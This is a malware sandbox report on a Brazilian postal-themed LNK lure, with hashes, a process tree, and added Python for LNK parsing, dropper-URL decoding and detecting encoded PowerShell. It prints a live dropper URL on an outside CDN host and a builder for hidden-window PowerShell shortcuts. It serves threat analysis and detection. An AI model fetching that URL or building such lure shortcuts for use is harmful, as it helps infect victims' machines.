Analysis

  • max time kernel
    51s
  • max time network
    51s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13-06-2024 02:31

General

  • Target

    Mercadoria_Devolvida-Correios-H0C42E2H.lnk

  • Size

    3KB

  • MD5

    246e74b6fffb9d5994f7f70bb6509b45

  • SHA1

    4b7bdf4808ce987b9f94ea40bdd081217867483a

  • SHA256

    0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e

  • SHA512

    178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score
10/10
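The target is a 3 KB shell link. The process tree further down shows what it launches at run time, but the same command line lives in the LNK's StringData and can be read statically before anything is detonated. The parser below is an added example for this page, not the sandbox's code and not derived from the bytes of Mercadoria_Devolvida-Correios-H0C42E2H.lnk: it validates the MS-SHLLINK header, skips the optional LinkTargetIDList and LinkInfo structures, and returns the name, relative path, working directory, arguments and ShowCommand. `build_lnk` constructs a synthetic shortcut to run it on; that shortcut's relative path to powershell.exe, its `-w hidden -en ...` arguments (a made-up token that decodes to `Add-Type`) and its ShowCommand of 7 are assumptions chosen to resemble the behaviour in this report, not facts the page states about the sample.

```python
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order, each only if its flag is set.
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))


def parse_lnk(data: bytes) -> dict:
    """Read the StringData of a shell link statically (never runs the target)."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if uuid.UUID(bytes_le=bytes(data[4:20])) != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    out = {"flags": flags,
           # ShowCommand sits at offset 60; 7 (SW_SHOWMINNOACTIVE) is a common
           # way for lure shortcuts to keep the console window out of sight.
           "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (u16) + IDList bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for key, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters
        pos += 2
        if flags & IS_UNICODE:
            out[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            out[key] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return out


def build_lnk(relative_path: str, arguments: str, name: str = "",
              show_command: int = 7) -> bytes:
    """Constructed sample shortcut for this example (not the report's file)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE | (HAS_NAME if name else 0)
    # HeaderSize, LinkCLSID, LinkFlags, FileAttributes (ARCHIVE), three FILETIMEs,
    # FileSize, IconIndex, ShowCommand, HotKey, Reserved1, Reserved2, Reserved3
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID.bytes_le, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def s(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + (s(name) if name else b"") + s(relative_path) + s(arguments)


if __name__ == "__main__":
    # Hypothetical lure shaped like the behaviour in this report: relative path
    # to powershell.exe plus a hidden-window encoded command (constructed values).
    sample = build_lnk(r"..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       "-w hidden -en QQBkAGQALQBUAHkAcABlAA==", name="Mercadoria devolvida")
    print(parse_lnk(sample))
```

The parser deliberately stops after StringData; real shortcuts also carry an IDList and ExtraData blocks (for example an EnvironmentVariableDataBlock that can hold a second copy of the target), which this example skips rather than interprets.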

Malware Config

Extracted

  • Language
    ps1 (deobfuscated)
  • URLs
    ps1.dropper: https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%
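The dropper URL's query string is itself a base64 token with its `=` padding percent-encoded as `%3D`. The decoder below is an added example, not part of the report: it assumes the lone trailing `%` shown on the page is extraction debris and strips it, and it treats the `|` inside the decoded value as a separator between a callback base URL and a tag, which is a reading of the plaintext rather than something the report states.

```python
import base64
from urllib.parse import urlsplit, unquote

# Dropper URL exactly as listed in the report's Malware Config section.
DROPPER_URL = ("https://1361227624.rsc.cdn77.org/v2/gl.php?"
               "aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%")


def decode_gl_param(url: str) -> dict:
    """Decode the base64 token that gl.php takes as its bare query string.

    '=' padding arrives as %3D.  The stray '%' at the end of the URL on the
    page is dropped (assumption: extraction debris), padding is restored if it
    was lost, and the plaintext is split on '|' into callback base and tag.
    """
    token = unquote(urlsplit(url).query).rstrip("%")
    token += "=" * (-len(token) % 4)
    plain = base64.b64decode(token, validate=True).decode("utf-8")
    callback, _, tag = plain.partition("|")
    return {"plaintext": plain, "callback": callback, "tag": tag}


if __name__ == "__main__":
    print(decode_gl_param(DROPPER_URL))
```

The decoded value points back at the same 1361227624.rsc.cdn77.org host that serves gl.php, so a block on that hostname covers both the first-stage fetch and whatever the token is handed to afterwards; the CDN front means the hostname, not the resolved IP, is the useful indicator.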

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4392
    • C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en …
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4268
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2812
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp" "c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP"
          4⤵
            PID:4928
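Two links in this tree are worth a detection on their own: powershell.exe started from a .lnk with an -EncodedCommand argument, and powershell.exe spawning csc.exe, which in turn spawns cvtres.exe. The second pattern is the footprint of Add-Type compiling C# at run time, and it is also why the 4mmjhbno.0.cs, 4mmjhbno.cmdline, 4mmjhbno.dll and RES50CF.tmp files appear under Downloads. The script below is an added example, not sandbox output: it replays process-creation events reconstructed from this tree (parent links follow the nesting and the PIDs are the ones logged; the root's parent PID is not on the page and is set to 0; the elided `-en` payload is replaced by a constructed token that decodes to `Add-Type`) and applies both rules, decoding the encoded command along the way. One caveat built into the first rule: the sandbox harness launched the LNK through `cmd /c`, whereas on a real host the shortcut is normally opened by explorer.exe, so the rule accepts either parent.

```python
import base64
import re
from collections import defaultdict

# Process-creation events reconstructed from the report's process tree.
# Assumptions: root ppid 0 (unknown on the page); the "-en" token is a constructed
# stand-in for the elided payload and decodes to "Add-Type".
EVENTS = [
    {"pid": 4392, "ppid": 0,
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk"},
    {"pid": 4268, "ppid": 4392,
     "image": r"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en QQBkAGQALQBUAHkAcABlAA=='},
    {"pid": 2812, "ppid": 4268,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline"'},
    {"pid": 4928, "ppid": 2812,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp" "c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP"'},
]

# powershell.exe accepts abbreviated forms of -EncodedCommand (-e, -ec, -en, -enc);
# the lookahead stops "-ep" and "-exec" from matching.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?(?=\s)", re.IGNORECASE)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Plaintext of an -EncodedCommand argument: base64 over UTF-16LE, not UTF-8."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    rest = cmdline[m.end():].split()
    if not rest:
        return None
    token = rest[0] + "=" * (-len(rest[0]) % 4)
    return base64.b64decode(token).decode("utf-16-le")


def find_lnk_encoded_powershell(events):
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if image_name(e["image"]) != "powershell.exe" or not ENCODED_FLAG.search(e["cmdline"]):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        # Sandbox harness: "cmd /c <file>.lnk".  Real hosts: explorer.exe opens the LNK.
        if ".lnk" in parent["cmdline"].lower() or image_name(parent["image"]) == "explorer.exe":
            hits.append({"rule": "lnk_encoded_powershell", "pid": e["pid"],
                         "parent_pid": parent["pid"],
                         "decoded": decode_encoded_command(e["cmdline"])})
    return hits


def find_powershell_runtime_compile(events):
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    hits = []
    for e in events:
        if image_name(e["image"]) != "csc.exe":
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or image_name(parent["image"]) not in ("powershell.exe", "pwsh.exe"):
            continue
        # Add-Type writes <rnd>.cs and <rnd>.cmdline under %TEMP%, runs
        # csc.exe /noconfig /fullpaths @"<rnd>.cmdline", and csc.exe runs cvtres.exe.
        m = re.search(r'@"?([^"]+\.cmdline)"?', e["cmdline"], re.IGNORECASE)
        hits.append({"rule": "powershell_runtime_compile", "pid": e["pid"],
                     "parent_pid": parent["pid"],
                     "response_file": m.group(1) if m else None,
                     "cvtres_child": any(image_name(c["image"]) == "cvtres.exe"
                                         for c in children[e["pid"]])})
    return hits


def scan(events):
    return find_lnk_encoded_powershell(events) + find_powershell_runtime_compile(events)


if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(hit)
```

The runtime-compile rule fires on legitimate administrative scripts that use Add-Type as well, so in production it is best scored together with the parent chain (a .lnk or Office parent, an encoded command, a user-writable working directory) rather than alerted on alone.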

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.dll

      Filesize

      3KB

      MD5

      0c39411b5d7354d62bc468e1ecc003cf

      SHA1

      f303e17b70669aafd6a78621c683cbbc0e9d68b3

      SHA256

      d79a3d27b16155dc85d3ee3119a11db06077c704acfae526f9bfe1cb5e1fb6bb

      SHA512

      00c71134e54b4b256b7de7de91b40a6af2261244ede10b808e95011a96f37f9982c0fe51d79b134574d01b088236456008caa6418037d41d45bf2e9ed3ed8641

    • C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp

      Filesize

      1KB

      MD5

      d86f725d547cb238fc0e460a6ec552f5

      SHA1

      2928afba43f00889d5e35240c7efb3d94c6e1918

      SHA256

      96323c77c7ab3ce4ded15543adf859c75dc903c3acddc8cdd9c7b5d11e847f81

      SHA512

      a3c5251303214d05e6c20a74ce13c1ea4eb357e64484b3cdd4214a496b6b20649a04bfcf8421da8e00622cff6cf4fb38bf20550ce7293c0cfae0c8bcc7ed6017

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hp2wrhz3.ztt.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • \??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.0.cs

      Filesize

      187B

      MD5

      7b0e7177dfbb9edd1c1ef08b4fdfae2f

      SHA1

      cb11a0252cdad66ec247312ccb7feb46456e52b6

      SHA256

      6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

      SHA512

      7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

    • \??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline

      Filesize

      369B

      MD5

      c7c971702ae33f87a3c605e7f9a8e3c2

      SHA1

      514d554d797228435d6a0751801826f058c0ed29

      SHA256

      aa232abe9b41ebdeff838a369cc012a1a1c46b870a321e7ac2a0f5f29a1d6a4e

      SHA512

      c14de704b6ea142b29899cfd8471a0d7d31419ac672228a2e96e39f093a3ba3f5f73e01e9a1e5c10ba13b6a275e36c6ab8ce950d20859fd106d229685f656b39

    • \??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP

      Filesize

      652B

      MD5

      32f206c989422b3df2f6225c9ac5f9be

      SHA1

      748aef167a738192b6ef21c964c30d9b169d2e4d

      SHA256

      5c3bb3f60b056476c2be7e746625fbddc7edd8cf6630dc873895511ad3964e0c

      SHA512

      edb9f7af5c9ed9e3ddfc6e32c407fa01fd09c54e5eee8f102c4dcff53c5631650c9d131f9e96ccb6447ce9f8d4979f7a6fb0ff9fb1e32b66130c58a85b2e2c02

    • memory/4268-2-0x00007FFD32733000-0x00007FFD32735000-memory.dmp

      Filesize

      8KB

    • memory/4268-3-0x000001E9CFC40000-0x000001E9CFC62000-memory.dmp

      Filesize

      136KB

    • memory/4268-13-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

      Filesize

      10.8MB

    • memory/4268-14-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

      Filesize

      10.8MB

    • memory/4268-27-0x000001E9CFC90000-0x000001E9CFC98000-memory.dmp

      Filesize

      32KB

    • memory/4268-31-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

      Filesize

      10.8MB